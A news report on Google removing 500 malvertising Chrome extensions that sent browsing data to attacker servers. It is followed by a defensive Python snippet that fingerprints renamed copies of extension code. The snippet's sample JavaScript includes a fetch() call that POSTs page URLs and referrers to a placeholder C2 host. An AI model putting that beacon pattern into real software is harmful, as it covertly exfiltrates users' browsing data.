Google has removed 500 harmful Chrome extensions from its Web Store after they were found to inject malicious ads and siphon off user browsing data to servers under the attackers' control.
The extensions were part of a malvertising and ad-fraud campaign that had been running since at least January 2019, and the evidence indicates that the actor behind the scheme may have been active since 2017.
A joint investigation by security researcher Jamila Kaya and Cisco-owned Duo Security initially identified 70 Chrome extensions with more than 1.7 million user installations.
After the findings were shared with Google, the company identified another 430 problematic browser extensions and subsequently disabled all of them.
Kaya and Duo Security's Jacob Rickerd wrote in the report: "The prominence of malvertising as an attack vector will continue to rise as long as tracking-based advertising remains ubiquitous, and particularly if users remain underserved by protection mechanisms."
Using Duo Security's Chrome extension security assessment tool, CRXcavator, the researchers were able to determine that the browser plugins operated by covertly connecting the browser clients to an attacker-controlled command-and-control (C2) server, which made it possible to exfiltrate private browsing data without the users' knowledge.
The extensions, which posed as promotion and advertising services, had near-identical source code that differed only in the names of their functions, thereby evading the Chrome Web Store's detection mechanisms.
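The renamed-function trick defeats a byte-for-byte hash of the extension code, but a fingerprint computed after normalizing identifiers groups the variants together. The following is an added, defender-side illustration of that idea; it is not code from the article or from Duo's CRXcavator, and the sample extension snippets and the C2 hostname are constructed placeholders.

```python
import hashlib
import re

# Constructed sample extension code (not the real extensions' source).
# VARIANT_B is VARIANT_A with every function and variable renamed.
VARIANT_A = """
function collect(u){var d=document.location.href;return {url:d,ref:u};}
function send(p){fetch("https://c2.example.invalid/beacon",{method:"POST",body:JSON.stringify(p)});}
send(collect(document.referrer));
"""
VARIANT_B = """
function gatherInfo(src){var loc=document.location.href;return {url:loc,ref:src};}
function relay(payload){fetch("https://c2.example.invalid/beacon",{method:"POST",body:JSON.stringify(payload)});}
relay(gatherInfo(document.referrer));
"""
UNRELATED = """
function add(a,b){return a+b;}
console.log(add(1,2));
"""

# JavaScript keywords and well-known globals that a rename campaign cannot
# change; every other identifier-like token (including member names) is
# replaced, which makes the fingerprint deliberately coarse.
KEEP = {
    "function", "var", "let", "const", "return", "if", "else", "for", "while",
    "new", "this", "true", "false", "null", "typeof", "document", "window",
    "fetch", "JSON", "console",
}
IDENT = r"[A-Za-z_$][\w$]*"
TOKEN = re.compile(r'"(?:\\.|[^"\\])*"|\'(?:\\.|[^\'\\])*\'|' + IDENT + r"|\d+|\S")


def normalize(source: str) -> str:
    """Replace author-chosen identifiers with placeholders numbered by first
    appearance, keeping strings, numbers, punctuation and KEEP names verbatim."""
    mapping = {}
    out = []
    for tok in TOKEN.findall(source):
        if re.fullmatch(IDENT, tok) and tok not in KEEP:
            tok = mapping.setdefault(tok, f"ID{len(mapping)}")
        out.append(tok)
    return " ".join(out)


def raw_hash(source: str) -> str:
    return hashlib.sha256(source.encode()).hexdigest()


def structural_hash(source: str) -> str:
    """Fingerprint that is stable under function/variable renaming."""
    return hashlib.sha256(normalize(source).encode()).hexdigest()
```

Variants that share a structural hash but differ in their raw hash are exactly the "same code, different names" pattern described above and are worth reviewing as one family.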